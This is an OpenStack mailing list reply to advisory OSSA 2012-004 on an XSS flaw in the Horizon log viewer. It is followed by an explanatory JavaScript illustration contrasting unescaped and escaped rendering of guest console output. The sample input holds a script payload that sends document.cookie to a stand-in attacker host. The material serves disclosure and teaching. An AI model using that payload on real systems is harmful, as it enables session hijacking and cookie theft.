openstack team mailing list archive

Re: [OSSA 2012-004] XSS vulnerability in Horizon log viewer

On 04/17/2012 08:51 AM, Russell Bryant wrote:
> OpenStack Security Advisory: 2012-004
> CVE: 2012-2094
> Date: April 17, 2012
> Title: XSS vulnerability in Horizon log viewer
> Impact: High
> Reporter: Matthias Weckbecker <mweckbecker@xxxxxxx>
> Products: Horizon
> Affects: All versions

One clarification: this issue is *not* present in the stable/diablo
branch of Horizon.

> Description:
> Matthias Weckbecker reported a vulnerability in Horizon. He noted that
> the log viewer refreshing mechanism does not escape the data fetched
> from guest consoles. This means that HTML with Javascript code gets
> interpreted as such, resulting in the ability to inject code into a
> dashboard session.
> 
> Fixes:
>   Folsom: https://review.openstack.org/#/c/6618/
>   2012.1: https://review.openstack.org/#/c/6621/
> 
> References:
>   http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-2094
>   https://bugs.launchpad.net/horizon/+bug/977944
> 


-- 
Russell Bryant
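The advisory above says the log viewer's refresh path put console text fetched from a guest into the page without escaping it. The snippet below is an added illustration of that class of bug, not Horizon's code and not the fix linked in the advisory: it models a refresh callback that builds the HTML fragment for a console pane, first unescaped and then with HTML escaping applied. The function names, the `escapeHtml` helper and the sample console output are all assumptions made for this example.

```javascript
// Added illustration: not Horizon's code and not the fix from the advisory.
// Models a log-viewer refresh that inserts console output fetched from a guest
// into the dashboard page, unescaped (vulnerable) and escaped (hardened).

// Constructed sample: console output a malicious guest could produce. One line
// carries an HTML/script payload; the rest is ordinary boot noise.
const SAMPLE_CONSOLE_OUTPUT = [
  "[    0.000000] Linux version 3.2.0 (buildd@host)",
  "login: <script>document.location='http://attacker.invalid/?c='+document.cookie</script>",
  "Starting services <b>done</b>",
].join("\n");

// Escape the five characters that matter when untrusted text is placed into
// HTML element content or a quoted attribute value.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable refresh: raw console text becomes markup. A <script> element or an
// event-handler attribute in the guest's output runs in the dashboard session,
// with that user's cookies and privileges.
function renderLogVulnerable(consoleText) {
  return "<pre class=\"console\">" + consoleText + "</pre>";
}

// Hardened refresh: the console text is escaped before being concatenated into
// the fragment, so the browser displays the payload as literal characters.
function renderLogHardened(consoleText) {
  return "<pre class=\"console\">" + escapeHtml(consoleText) + "</pre>";
}

// Check used by the demo: does the rendered fragment still contain a script
// tag as markup (i.e. an unescaped "<script")?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Stand-alone demo when run directly with node.
if (typeof require !== "undefined" && require.main === module) {
  console.log("vulnerable fragment has script tag:",
    containsScriptTag(renderLogVulnerable(SAMPLE_CONSOLE_OUTPUT)));
  console.log("hardened fragment has script tag:  ",
    containsScriptTag(renderLogHardened(SAMPLE_CONSOLE_OUTPUT)));
}
```

In a real browser page the hardened path should prefer a DOM API that never parses the input as markup at all, such as assigning the fetched text to `textContent` of the `<pre>`, rather than escaping and then assigning `innerHTML`; the string-building form is used here only so the example runs outside a browser. The same rule applies server-side: if the view that serves the refresh returns the console text for insertion as HTML, it must escape it with the framework's HTML-escaping helper before sending it.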